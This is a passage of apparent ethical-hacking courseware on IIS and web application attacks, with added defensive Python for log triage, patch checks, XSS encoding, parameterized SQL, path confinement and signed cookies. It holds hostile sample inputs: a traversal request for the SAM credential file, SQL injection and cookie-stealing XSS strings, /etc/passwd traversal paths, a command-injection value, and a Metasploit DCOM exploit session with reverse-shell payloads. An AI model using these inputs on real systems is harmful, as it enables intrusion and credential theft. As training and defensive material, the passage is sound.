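2002-06-10 12:53:43 4.5.6.7 GET /a.asp/..%c1%9c../winnt/repair/sam - 404
2002-06-10 12:53:50 10.1.1.5 GET /images/logo.gif - 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per record, keyed by the names in the most recent #Fields line."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue   # malformed or pre-header line: skip rather than crash
        yield dict(zip(fields, values))


def indicators(uri_stem):
    """Names of the traversal signatures present in a logged request path."""
    found = []
    if OVERLONG.search(uri_stem):
        found.append("overlong-utf8")
    if DOUBLE_ENCODED.search(uri_stem):
        found.append("double-encoded")
    if DOT_DOT.search(uri_stem):
        found.append("dot-dot")
    return found


def triage(lines):
    """Group suspicious requests by client IP.

    Returns {c-ip: [(time, uri_stem, indicators, status), ...]}. A 200 on a request
    that reached cmd.exe (second sample line) means the traversal worked and is the
    record to escalate first; the 404 and 500 are attempts that failed."""
    per_client = defaultdict(list)
    for rec in parse_w3c(lines):
        hits = indicators(rec["cs-uri-stem"])
        if hits:
            per_client[rec["c-ip"]].append(
                (rec["time"], rec["cs-uri-stem"], hits, rec["sc-status"]))
    return dict(per_client)


def successful_hits(lines):
    """Subset of triage() entries that the server answered with 200."""
    return {ip: [e for e in entries if e[3] == "200"]
            for ip, entries in triage(lines).items()}


if __name__ == "__main__":
    for ip, entries in triage(SAMPLE_LOG).items():
        print(ip)
        for t, stem, hits, status in entries:
            print(f"  {t}  {status}  {','.join(hits):25} {stem}")
```

Because the grouping key is the client IP, a gap in one client's otherwise continuous activity in the local file, compared with a copy forwarded to a collector, is the sign that a cleaner such as the one on the slide has been run.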
Unspecified Executable Path Vulnerability

• When executables and DLL files are not preceded by a path in the registry (e.g. explorer.exe does not have a fixed path by default).
• Windows NT 4.0/2000 will search for the file in the following locations, in this order:
  • the directory from which the application loaded
  • the current directory of the parent process
  • ...\system32
  • ...\system
  • the Windows directory
  • the directories specified in the PATH environment variable
Metasploit Framework

• The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code.
• A tool for penetration testing, exploit development, and vulnerability research.
• The framework was composed in the Perl scripting language and consists of several components written in C, assembler, and Python.
• Runs on any UNIX-like system under its default configuration.
• A customized Cygwin environment is provided for Windows OS users.
Metasploit Screenshot

Starting the console

[Screenshot: two Konsole windows. The first shows the usable win32 payloads (bind shell, bind DLL inject, bind Meterpreter DLL inject, staged bind shell, staged bind upload/execute, bind VNC server DLL inject, execute command, execute net user /ADD, reverse shell, reverse DLL inject, reverse Meterpreter DLL inject, staged reverse ordinal shell, reverse ordinal VNC server DLL inject, staged reverse shell, staged reverse upload/execute, reverse VNC server DLL inject) and the info page for "Windows Staged Reverse Ordinal Shell" (OS/CPU: win32/x86, Needs Admin: No, Multistage: Yes, Total Size: 94, Keys: reverse +ws2ord; provided by spoonm, skape and vlad902; options EXITFUNC = seh (exit technique: "process", "thread", "seh"), LHOST (local address to receive connection), LPORT = 4321 (local port to receive connection)). The second shows the console session below.]

+ -- --=[ msfconsole v2.3 [46 exploits - 59 payloads]
msf > help

Metasploit Framework Main Console Help

  ?        Show the main console help
  cd       Change working directory
  exit     Exit the console
  help     Show the main console help
  info     Display detailed exploit or payload information
  quit     Exit the console
  reload   Reload exploits and payloads
  save     Save configuration to disk
  setg     Set a global environment variable
  show     Show available exploits and payloads
  unsetg   Remove a global environment variable
  use      Select an exploit by name
  version  Show console version

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > show
advanced options payloads targets
msf msrpc_dcom_ms03_026 > show options

Exploit Options

  Exploit:   Name    Default   Description
  required   RHOST             The target address
  required   RPORT   135       The target port

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 > []
Scenario

The system in Jason's firm was running Microsoft Windows 2000 with Internet Information Server (IIS) enabled.

Jason scanned the system and discovered that it was susceptible to the WebDAV protocol vulnerability. This vulnerability allowed him to upload and download files stored on the web server. Jason could also send specially crafted requests to the server, which enabled him to execute arbitrary commands and alter files.

• Is it possible to trace back the evil activity?
• Do you think that IIS log files can be tampered with?
• How can such vulnerabilities be prevented?
Hotfixes and Patches

• A hotfix is code that fixes a bug in a product. The users may be notified through emails or through the vendor's website.
• Hotfixes are sometimes packaged as a set of fixes called a combined hotfix or service pack.
• A patch can be considered a repair job for a problem in a piece of programming. A patch is the immediate solution that is provided to users.
What is Patch Management?

© "Patch management is a process used to ensure that the appropriate patches are installed on a system."

© It involves the following:

• Choosing, verifying, testing, and applying patches

• Updating previously applied patches with current patches

• Listing patches applied previously to the current software

• Recording repositories, or depots, of patches for easy selection

• Assigning and deploying applied patches
Solution: UpdateExpert

© UpdateExpert is a Windows administration program that helps you secure your systems by remotely managing service packs and hotfixes.

© Microsoft constantly releases updates for the OS and mission-critical applications, which fix security vulnerabilities and system stability problems.

© UpdateExpert enhances security, keeps systems up-to-date, eliminates sneaker-net, improves system reliability and QoS.
Patch Management Tool: qfecheck

C:\CEH\Haja\patch>qfecheck /v

Windows 2000 Hotfix Validation Report for \\SYSTEM5
Report Date: 5/17/2005 2:23pm

Current Service Pack Level: Service Pack 4

Hotfixes Identified:

Q327194: Current on system.
KB820888: Current on system.
KB822831: Current on system.
KB823182: Current on system.
KB823559: Current on system.
KB824105: Current on system.
KB825119: Current on system.
KB826232: Current on system.
KB828036: Current on system.
KB828741: Current on system.
KB828749: Current on system.
KB835732: Current on system.
KB837001: Current on system.
KB839646: Current on system.
KB840315: Current on system.
KB840987: Current on system.
KB841356: Current on system.
KB841533: Current on system.
KB841872: Current on system.
KB841873: Current on system.
KB842526: Current on system.
KB842773: Current on system.
KB871250: Current on system.
KB873333: Current on system.
KB873339: Current on system.
KB885250: Current on system.
KB885835: Current on system.
KB885836: Current on system.
KB888113: Current on system.
KB890047: Current on system.
KB890175: Current on system.
KB890859: Current on system.
KB891711: Current on system.
KB891781: Current on system.
KB893066: Current on system.
KB893086: Current on system.
KB893803: Current on system.
Q818043: Current on system.

© Qfecheck allows customers to diagnose and eliminate the effects of anomalies in the packaging of hotfixes for Microsoft Windows 2000.

© Qfecheck.exe determines which hotfixes are installed by reading the information stored in the following registry key:

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates
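A report like the one above is only useful if somebody compares it against what the organisation requires. The following is an added example, not part of the EC-Council courseware and not a tool shipped with qfecheck: it parses a qfecheck-style validation report and lists every required hotfix that is absent or not reported as current. The report text, the KB numbers in the required list, and the "should be reinstalled" line are constructed sample data.

```python
"""Parse a qfecheck-style hotfix validation report and check it against a
required-hotfix baseline.  Added example; the report and baseline are
constructed sample data, not output from a real system."""
import re

# Constructed, abridged qfecheck report.  The KB841873 status line is invented
# here to show how a non-current hotfix is handled.
SAMPLE_REPORT = """\
Windows 2000 Hotfix Validation Report for \\\\SYSTEM5
Report Date: 5/17/2005 2:23pm

Current Service Pack Level: Service Pack 4

Hotfixes Identified:

Q327194: Current on system.
KB820888: Current on system.
KB835732: Current on system.
KB841873: This hotfix should be reinstalled.
KB890859: Current on system.
"""

# One "<id>: <status>." line per hotfix; ids are KBnnnnnn or Qnnnnnn.
HOTFIX_LINE = re.compile(r"^(?P<id>(?:KB|Q)\d+):\s*(?P<status>.+?)\.?\s*$")


def parse_report(text):
    """Return (service_pack, {hotfix_id: status}) from a validation report."""
    service_pack = None
    hotfixes = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Current Service Pack Level:"):
            service_pack = line.split(":", 1)[1].strip()
            continue
        m = HOTFIX_LINE.match(line)
        if m:
            hotfixes[m.group("id")] = m.group("status")
    return service_pack, hotfixes


def compliance_gaps(hotfixes, required):
    """Map each required hotfix that is not 'Current on system' to the reason.

    A hotfix that is listed with any other status, or not listed at all,
    cannot be relied on and should be (re)applied.
    """
    gaps = {}
    for kb in required:
        status = hotfixes.get(kb)
        if status != "Current on system":
            gaps[kb] = status or "not listed"
    return gaps


if __name__ == "__main__":
    sp, fixes = parse_report(SAMPLE_REPORT)
    # Constructed baseline of hotfixes this organisation requires.
    required = ["KB835732", "KB841873", "KB890859", "KB893066"]
    print("Service pack:", sp)
    for kb, why in compliance_gaps(fixes, required).items():
        print(f"ACTION NEEDED {kb}: {why}")
```

The baseline list is the piece the slide calls "listing patches applied previously": kept outside the script in practice, it is what turns a per-host report into a compliance decision.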
Patch Management Tool: HFNetChk

© A command-line tool that enables the administrator to check the patch status of all the machines in a network remotely.

© It does this by referring to an XML database that is constantly updated by Microsoft.

[Screenshot: C:\WINNT\System32\cmd.exe running HFNetChk. Recoverable output:]

MICRON
    WINDOWS 2000 SP2
        Patch NOT Found   MS00-077
        Patch NOT Found   MS00-079
        Patch NOT Found   MS01-007
        Patch NOT Found   MS01-013
        WARNING           MS01-022
        Patch NOT Found   MS01-025
        Patch NOT Found   MS01-037
        Patch NOT Found   MS01-041
    Internet Information Services 5.0
        Patch NOT Found   MS01-025
    Internet Explorer 5.5 SP2
        INFORMATION       All necessary hotfixes have been applied

(Q article numbers shown alongside the bulletins, in screenshot order: Q299796, Q276471, Q285851, Q285156, Q296441, Q296185, Q302755, Q298012, Q296185)
cacls.exe utility

© Built-in Windows 2000 utility (cacls.exe) can set access control list (ACL) permissions globally.

© To change permissions on all executable files to System: Full, Administrators: Full:

C:\>cacls.exe c:\myfolder\*.exe /T /G System:F Administrators:F

[Screenshot: Command Prompt]

C:\Snort>cacls.exe *.exe /T /G System:F Administrators:F

Are you sure (Y/N)?y

processed file: C:\Snort\snort.exe

C:\Snort>

Vulnerability Scanners

© The different types of vulnerability scanners according to their availability are:

• Online Scanners: e.g. www.securityseers.com.

• Open Source scanners: e.g. Snort, Nessus Security Scanner, Nmap, etc.

• Linux Proprietary Scanners: The resource for scanners on Linux is SANE (Scanner Access Now Easy). Besides SANE there is XVScan, Parallel Port Scanners under Linux, and USB Scanners on Linux.

• Commercial Scanners: these can be bought from the vendors.
Online Vulnerability Search Engine

[Screenshot: the ICAT Metabase search page (NIST). Recoverable text follows.]

ICAT contains: 7630 vulnerabilities. Last updated: 05/02/05

ICAT is a searchable index of information on computer vulnerabilities. It provides search capability at a fine granularity and links users to vulnerability and patch information.

Enter your e-mail address and press "Add" to receive ICAT announcements.

The ICAT team appreciates the contributions and support of the following organizations: CERIAS, FedCIRC, ISS X-Force, NIAP, SANS Institute, and Security Focus.

Your CVE Vulnerability Search Engine: SEARCH | DOWNLOAD | NOTIFICATION | CONTACT | STATISTICS

Search tips:

• All drop down menus are ANDed together to create a query.

• Click a link below to look up vulnerabilities by vendor or product name (links for A..B, C..E, F..H, I..K, L..N, O..Q, R..T, U..W, X..Z, All; "." represents non-alphabetic characters).

• Double-quotes are ignored in text-search; individual words are ANDed together.

Search form fields: time range (All entries / 1 Year / 6 Months / 3 Months / Reset values); Vendor; Product; Version; Keyword search (try a CVE or CAN name); Severity; General Filters: Common Sources, Related exploit range, Vulnerability consequence, Vulnerability type, Exposed component type, Entry type, Entries since the following date (Any Month / Any Year).

The ICAT Metabase is a product of the Computer Security Division at the National Institute of Standards and Technology.

ICAT Creator: Peter Mell
Network Tool: Whisker

© Whisker is an automated vulnerability scanning software that scans for the presence of exploitable files on remote web servers.

© Refer to the output of this simple scan below and you will see that Whisker has identified several potentially dangerous files on this IIS server.

c:\>whisker.pl -h victim.com -s scan.db

= Host: victim.com

-- Server: Microsoft-IIS/5.0

+ 200 OK: GET /whisker.ida

+ 200 OK: GET /whisker.idq

+ 200 OK: HEAD /_vti_inf.html

+ 200 OK: HEAD /_vti_bin/shtml.dll

+ 200 OK: HEAD /_vti_bin/shtml.exe
Network Tool: N-Stealth Scanner

© N-Stealth 5 is an impressive web vulnerability scanner that scans over 18000 HTTP security issues.

© Stealth HTTP Scanner writes scan results to an easy HTML report.

© N-Stealth is often used by security companies for penetration testing and system auditing, specifically for testing web servers.
Network Tool: WebInspect

© WebInspect is an impressive web server and application-level vulnerability scanner that scans over 1500 known attacks.

© It checks site contents and analyzes for rudimentary application issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.

© It can analyze a basic web server in 4 minutes, cataloging over 1500 HTML pages.
[Screenshot: WebInspect ("Quick Scan.spc") scanning endo.webappsecurity.com. Recoverable text follows.]

Site tree (SiteView): /_private, /_vti_log, /admin (admin.html, help.cgi), /Scripting (user.php), /backup, /cgi-bin, /custapps, ...

Alert detail: CVS leaves sensitive information in this directory. This information could b[...] system and give an attacker knowledge which could later be used in [...]
Fix: Remove the repository from the public server.

Summary (Severity / Count / Type / Summary / URL):

Critical   2   Vulnerability   Database Server Error Message                              http://endo.webappsecurity.com
Critical   1   Vulnerability   IIS 5.0 Internet Printing Protocol ISAPI Buffer Overflow   http://endo.webappsecurity.com
Critical   1   Vulnerability   IIS Global Server Variables Disclosure (global.asa.bak)    http://endo.webappsecurity.com
Critical   1   Vulnerability   Backup Files (cgi.zip)                                     http://endo.webappsecurity.com
Critical   1   Vulnerability   CVS Content Files                                          http://endo.webappsecurity.com

Picture Source:

http://www.progress.co.nz/eMailers/images/sdm0307d_f2.jpg
Network Tool: Shadow Security Scanner

© Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet, and extranet environments.

© Shadow Security Scanner includes vulnerability auditing modules for many systems and services.

© These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, users and accounts, password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgreSQL, Interbase, MiniSQL, and more.
Shadow Security Scanner

[Screenshot: Shadow Security Scanner 5.15, "Scan with Complete Scan policy", run against 127.0.0.1. Recoverable details follow.]

Address: 127.0.0.1    Host Name: anonymous
Average Ping Response: 0 ms    Time To Live: 128    Packet Size: 56
Start Scan Date: 17.02.2002 13:09:52    End Scan Date: 17.02.2002 13:12:24
OS Detected: Microsoft Windows 2000
Opened Ports: 20    Closed Ports: 1417    Blocked Ports: 0

Findings tree: Whois Information; IP Services: SNMP Remote Access, chargen service, echo service

Open ports listed:

   7    ECHO - Echo
   9    DISCARD - Discard
  13    DAYTIME - Daytime
  17    QOTD - Quote of the Day
  19    (service name not legible in the screenshot)
  53    DOMAIN - Domain Name Server
 135    RPC-LOCATOR - RPC (Remote Procedure Call) Location Service
 445    MICROSOFT-DS - Microsoft-DS
 515    PRINTER - Printer Spooler
 548    AFPOVERTCP - AFP over TCP
1025    LISTEN - listen

Drives: H:\

Processes: 0 - System Idle Process; 8 - System; 176 - smss.exe; 204 - csrss.exe; 228 - winlogon.exe; 252 - Winampa.exe

Status bar: Scan Complete    Modules: 0    Next scan host:    Vulnerable: 1225
Countermeasures

© IISLockdown:

• IISLockdown restricts anonymous access to system utilities as well as the ability to write to web content directories.

• It disables Web Distributed Authoring and Versioning (WebDAV).

• It installs the URLScan ISAPI filter.

© URLScan:

• URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
File System Traversal Countermeasures

© Microsoft recommends setting the NTFS ACLs on cmd.exe and several other powerful executables to Administrators and SYSTEM: Full Control only.

© Sample files must be removed.

© Monitor the audit logs.

© Apply Microsoft patches and hotfixes regularly.
Increasing Web Server Security

© Use of Firewalls

© Administrator Account Renaming

© Disabling the Default Websites

© Removal of Unused Application Mappings

© Disabling Directory Browsing

© Legal Notices

© Service Packs, Hotfixes, and Templates

© Checking for Malicious Input in Forms and Query Strings

© Disabling Remote Administration

Summary

© Web servers assume critical importance in the realm of Internet security.

© Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often.

© The inherent security risks owing to compromised web servers have impact on the local area networks that host these websites, even on the normal users of web browsers.

© Looking through the long list of vulnerabilities that had been discovered and patched over the past few years provides an attacker ample scope to plan attacks on unpatched servers.

© Different tools/exploit codes aid an attacker in perpetrating web server hacking.

© Countermeasures include scanning for existing vulnerabilities and patching them immediately, anonymous access restriction, incoming traffic request screening, and filtering.
Ethical Hacking

Module XII

Web Application Vulnerabilities

Scenario

George and Brett are friends. Brett is a web administrator of his company's Website. George is a computer geek. He finds security holes in Brett's Website and claims that he can:

• Steal identities

• Hijack accounts

• Manipulate web pages/inject malicious codes into the client's browser

• Have access to confidential resources

Brett challenges his claim, maintaining that his Website is secure and free from any intrusion.

George thinks that it's time to prove his mettle.

What next?

Picture Source:

http://daz00k.free.fr/geek.gif
Module Objective

© Understanding web application setup
© Objectives of web application hacking
© Anatomy of an attack
© Web application threats
© Countermeasures
© Tools:

• Wget

• BlackWidow

• Window Bomb

• WebSleuth

• Burp
Module Flow

[Flow diagram linking these stages:]

• Web Application Setup

• Web Application Hacking

• Anatomy of the Attack

• Web Application Hacking Tools

• Countermeasures
Web Application Setup

© A client/server software application that interacts with users or other systems using HTTP.

© Modern applications typically are written in Java (or similar languages) and run on distributed application servers, connecting to multiple data sources through complex business logic tiers.
Web Application Setup

[Diagram:]

WEB CLIENT  --- HTTP REQUEST (CLEAR TEXT OR SSL) --->  WEB SERVER (APACHE, IIS, NETSCAPE, etc.)  <--->  SQL DATABASE

WEB CLIENT  <--- HTTP REPLY (JAVASCRIPT, VBSCRIPT, HTML, etc.) ---  WEB SERVER
Web Application Hacking

© Exploitative behaviors

• Defacing Websites

• Stealing credit card information

• Exploiting server-side scripting

• Exploiting buffer overflows

• Domain Name Server (DNS) attacks

• Employ malicious code

Picture Source:

http://www.governmentsecurity.org/articles/images/SQL_inj.jpg
Anatomy of an Attack

[Diagram:] INFORMATION GATHERING -> PLANNING THE ATTACK -> LAUNCHING THE ATTACK
Web Application Threats

© Cross-site scripting

© SQL injection

© Command injection

© Cookie/session poisoning

© Parameter/form tampering

© Buffer overflow

© Directory traversal/forceful browsing

© Cryptographic interception

© Cookie snooping

© Authentication hijacking

© Log tampering

© Error message interception attack

© Obfuscation application

© Platform exploits

© DMZ protocol attacks

© Security management exploits

© Web services attacks

© Zero day attack

© Network access attacks

© TCP fragmentation
Cross-Site Scripting

© Occurs when an attacker uses a web application to send malicious code, generally JavaScript

© Stored attacks are those where the injected code is permanently stored on the target servers in a database

© Reflected attacks are those where the injected code takes another route to the victim, such as in an Email message

© Disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account

© Disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page, and modifying presentation of content

© Web servers, application servers, and web application environments are susceptible to cross-site scripting
An Example of XSS

[Diagram: "Script Host" and "Hacker's Computer", with the injected fragment passing between them:]

<script>
evilscript()
</script>
Countermeasures

© Validation of all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification

© A stringent security policy

© Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
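The two controls on this slide, validating every parameter against a specification and filtering what goes out to the browser, look like this in code. The following is an added example, not part of the EC-Council courseware: a tiny in-memory guestbook renders visitor comments into HTML once the vulnerable way (raw concatenation) and once with output encoding, alongside an allowlist validator for a username parameter. The comments and the username pattern are constructed sample data.

```python
"""Stored XSS neutralised by output encoding plus allowlist input validation.
Added example; the comments and the username specification are constructed."""
import html
import re

# Constructed sample: the second comment is the classic stored-XSS test string.
# Copied into the page verbatim it would execute in every later visitor's browser.
COMMENTS = [
    "Nice site!",
    "<script>alert(document.cookie)</script>",
    'Bob said "hi" & left <3',
]

# A "rigorous specification" for one parameter: 3-20 word characters, nothing else.
USERNAME_SPEC = re.compile(r"^[A-Za-z0-9_]{3,20}$")


def render_unsafe(comments):
    """Vulnerable pattern: stored user input concatenated straight into markup."""
    return "".join(f"<li>{c}</li>" for c in comments)


def render_safe(comments):
    """Same page with every untrusted value HTML-encoded at the point of output.

    html.escape turns < > & " ' into entities, so the browser displays the
    text of the payload instead of executing it.  This is the slide's
    "filtering script output"; validation (below) is applied independently.
    """
    return "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)


def validate_username(value):
    """Allowlist validation: accept only values matching the specification.
    Rejecting rather than 'cleaning' avoids guessing what an attacker meant."""
    return bool(USERNAME_SPEC.match(value))


def contains_script_tag(markup):
    """Crude check used only to contrast the two renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_unsafe(COMMENTS))
    print(render_safe(COMMENTS))
    print(validate_username("alice_01"), validate_username("<script>"))
```

Encoding belongs at the output boundary (HTML body here; URL, attribute and JavaScript contexts each need their own encoder), which is why validation on the way in is not a substitute for it.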
SQL Injection

© Uses SQL to directly manipulate database data

© An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data

© SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

© Countermeasure

• Check user input to database queries

• Validate and sanitize every user variable passed to the database

Picture Source:

http://www.vaemergency.com/emupdatenew/articles/03jan/images_03jan/injection.jpg
Command Injection

© Relays malicious code through a web application to another system

© Attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e., SQL injection)

© Scripts written in perl, python, and other languages can be injected into poorly designed web applications
Countermeasures

© Use language-specific libraries that avoid problems due to shell commands

© Validate the data provided to prevent any malicious content

© Structure requests so that all supplied parameters are treated as data, rather than potentially executable content

© J2EE environments allow the use of the Java sandbox, which can prevent the execution of system commands
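"Treat all supplied parameters as data" is the countermeasure shared by the SQL injection slide and the command injection slide above. The following is an added example, not part of the EC-Council courseware: a login check written once with string-built SQL (vulnerable) and once with placeholders (hardened), plus a command-line builder that validates its argument and passes it as a separate argv element rather than through a shell. The SQLite table, its two users and the hostname pattern are constructed sample data; nothing is executed outside the in-memory database.

```python
"""SQL injection and command injection: vulnerable form beside hardened form.
Added example; the user table and the hostname rule are constructed."""
import re
import sqlite3

HOSTNAME_SPEC = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def make_db():
    """In-memory SQLite database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, name, password):
    """Vulnerable: input is spliced into the SQL text, so a quote in the
    input rewrites the WHERE clause (the textbook  ' OR '1'='1  case)."""
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, name, password):
    """Hardened: placeholders make every supplied value data, never SQL.
    The same input that bypassed the check above is now just a wrong password."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def ping_argv(host):
    """Command-injection-safe replacement for os.system('ping ' + host).

    The host is validated against an allowlist pattern and returned as a
    separate argv element; handing this list to subprocess.run() with no shell
    means metacharacters such as ';' or '|' are never interpreted.  Returns
    None for input that fails validation.
    """
    if not HOSTNAME_SPEC.match(host):
        return None
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "alice", probe))   # True
    print("safe:      ", login_safe(db, "alice", probe))         # False
    print(ping_argv("example.com"), ping_argv("example.com; echo"))
```

The parameterized version does not sanitize anything; it never lets the value reach the SQL parser as syntax, which is why it holds up against inputs the author of an escaping routine did not anticipate.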
Cookie/Session Poisoning

© Cookies are used to maintain session state in the otherwise stateless HTTP protocol

© Poisoning allows an attacker to inject malicious content, modify the user's on-line experience, and obtain unauthorized information

© A proxy can be used for rewriting the session data, displaying the cookie data and/or specifying a new User ID or other session identifiers in the cookie
[Screenshot: a cookie-management dialog ("Filter cookies...") listing stored cookies by site, e.g. adobe.com [AWID], mcafee.com [GUID], tvguide.com [SITESERVER], hostme.com (ssl) [mot_v15_OrderID], with columns Path, Cookie Name and Cookie Data. The selected hostme.com cookie shows its name and data in plain text.]
Countermeasures

© Plain text or weakly encrypted passwords should not be stored in a cookie

© Cookie timeout should be implemented

© Cookie authentication credentials should be associated to an IP address

© Availability of logout functions should be provided
Parameter/Form Tampering

© Takes advantage of the hidden or fixed fields that work as the only security measure in some applications

© Modifying this hidden field value will cause the web application to change according to the new data incorporated

© Can cause theft of services, escalation of access, and session hijacking

© Countermeasure: Field validity checking
Buffer Overflow

© Used to corrupt the execution stack of a web application

© Buffer overflow flaws in custom web applications are less likely to be detected

© Almost all known web servers, application servers, and web application environments are susceptible to attack (save Java and J2EE environments, except for overflows in the JVM itself)

Picture Source:

http://www.wsl.ch/land/biodiversity/gendiv/BAFE/overflow.gif
Countermeasures

© Validate input length in forms

© Bounds checking should be done and extra care should be maintained when using for and while loops to copy data

© StackGuard and StackShield for Linux are tools to defend programs and systems against stack-smashing
Directory Traversal/Forceful Browsing

© Attack occurs when the attacker is able to browse directories and files outside normal application access

© Attack exposes the directory structure of the application, and often the underlying web server and operating system

© Attacker can enumerate contents, access secure or restricted pages, and gain confidential information, locate source code, etc.
Countermeasures

© Define access rights to protected areas of the Website

© Apply checks/hotfixes that prevent the exploitation of vulnerabilities such as Unicode to affect directory traversal

© Web servers should be updated with security patches in a timely manner
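The file-system traversal countermeasures earlier in this module (NTFS ACLs, removing sample files) and the access-rights countermeasure on this slide both assume the application itself refuses to serve anything outside its web root. The following is an added example, not part of the EC-Council courseware, of the check a static-file handler needs: decode the requested path once, normalise it, and confirm that the resolved real path still lies inside the real web root before opening it. The web root, its single page and the request paths are constructed; the root is created in a temporary directory so the block runs anywhere.

```python
"""Confining file requests to the web root (directory traversal defence).
Added example; the web root contents and request paths are constructed."""
import os
import tempfile
import urllib.parse

# Constructed web root with one page, created fresh so the example is self-contained.
ROOT = tempfile.mkdtemp(prefix="webroot-")
os.makedirs(os.path.join(ROOT, "docs"))
with open(os.path.join(ROOT, "docs", "index.html"), "w") as f:
    f.write("<h1>constructed sample page</h1>")


def resolve_request(path, root=ROOT):
    """Map a URL path to a filesystem path, or return None if it would escape
    the root.  Steps: percent-decode once (a '%' surviving the decode means
    the client double-encoded, which is refused), treat '\\' like '/', join
    under the root, then compare real paths so '..' and symlinks are resolved
    before the containment check rather than after."""
    decoded = urllib.parse.unquote(path)
    if "%" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    real_root = os.path.realpath(root)
    if os.path.commonpath([candidate, real_root]) != real_root:
        return None
    return candidate


def serve(path, root=ROOT):
    """Return (status, body) the way a minimal static handler would."""
    target = resolve_request(path, root)
    if target is None:
        return 403, ""
    if not os.path.isfile(target):
        return 404, ""
    with open(target) as fh:
        return 200, fh.read()


if __name__ == "__main__":
    for p in ["/docs/index.html", "/docs/../../../etc/passwd",
              "/docs/%2e%2e/%2e%2e/etc/passwd", "/%252e%252e/"]:
        print(p, "->", serve(p)[0])
```

Checking the resolved path rather than the request string is the point: a denylist of ".." strings is what Unicode and double-encoding tricks were designed to slip past, whereas a containment check on the canonical path does not care how the request was spelled.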
Cryptographic Interception

© Using cryptography, a confidential message can be securely sent between two parties

© Encrypted traffic flows through network firewalls and IDS systems and is not inspected

© If an attacker is able to take advantage of a secure channel, he can exploit it more efficiently than an open channel

© Countermeasure

• Use of Secure Sockets Layer (SSL) and advanced private key protection
Cookie Snooping

© In an attempt to protect cookies, site developers often encode the cookies

© Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many a false sense of security regarding the use of cookies

© Cookie snooping techniques can use a local proxy to enumerate cookies

© Countermeasure

• Encrypted cookies should be used

• Embedded source IP address in the cookie

• Cookie mechanism can be fully integrated with SSL functionality for secured remote web application access
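The cookie/session poisoning countermeasures earlier in this module (timeout, binding to an IP address) and the cookie snooping countermeasures above come together in how a session cookie is issued and checked. The following is an added example, not part of the EC-Council courseware, that contrasts a Base64-"protected" cookie, which anyone holding it can read back, with a token whose payload (user, client IP, expiry) is authenticated by an HMAC so that altering any field, replaying it from another address, or presenting it after the timeout is rejected. The key, the session values and the addresses are constructed; in production the key comes from a secret store and the cookie is also sent with the Secure and HttpOnly flags over SSL.

```python
"""Session cookies: reversible encoding versus a signed, expiring, IP-bound token.
Added example; key, session data and client addresses are constructed."""
import base64
import hashlib
import hmac
import json
import time

SECRET_KEY = b"constructed-demo-key-not-for-real-use"  # constructed


def encode_cookie_weak(session):
    """What the slide warns about: Base64 only hides the data from casual view."""
    return base64.b64encode(json.dumps(session).encode()).decode()


def decode_cookie_weak(cookie):
    """Anyone holding the cookie (a local proxy, a sniffer) reads it straight back."""
    return json.loads(base64.b64decode(cookie))


def issue_cookie(user_id, client_ip, ttl_seconds, now=None):
    """Cookie value = base64url(payload) '.' HMAC-SHA256(payload).
    The payload binds the user to the client IP and an expiry time, so the
    server can verify all three on every request without storing state."""
    now = time.time() if now is None else now
    payload = json.dumps({"uid": user_id, "ip": client_ip,
                          "exp": now + ttl_seconds}, sort_keys=True).encode()
    mac = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + mac


def verify_cookie(cookie, client_ip, now=None):
    """Return the user id, or None if the cookie is malformed, forged or
    altered, presented from another address, or past its timeout."""
    now = time.time() if now is None else now
    try:
        b64, mac = cookie.rsplit(".", 1)
        payload = base64.urlsafe_b64decode(b64)
    except ValueError:            # no separator, or bad base64
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):   # constant-time comparison
        return None
    data = json.loads(payload)
    if data["ip"] != client_ip or data["exp"] < now:
        return None
    return data["uid"]


if __name__ == "__main__":
    weak = encode_cookie_weak({"uid": "alice", "role": "user"})
    print("weak cookie decodes to:", decode_cookie_weak(weak))
    c = issue_cookie("alice", "10.0.0.5", ttl_seconds=600)
    print("valid:", verify_cookie(c, "10.0.0.5"))
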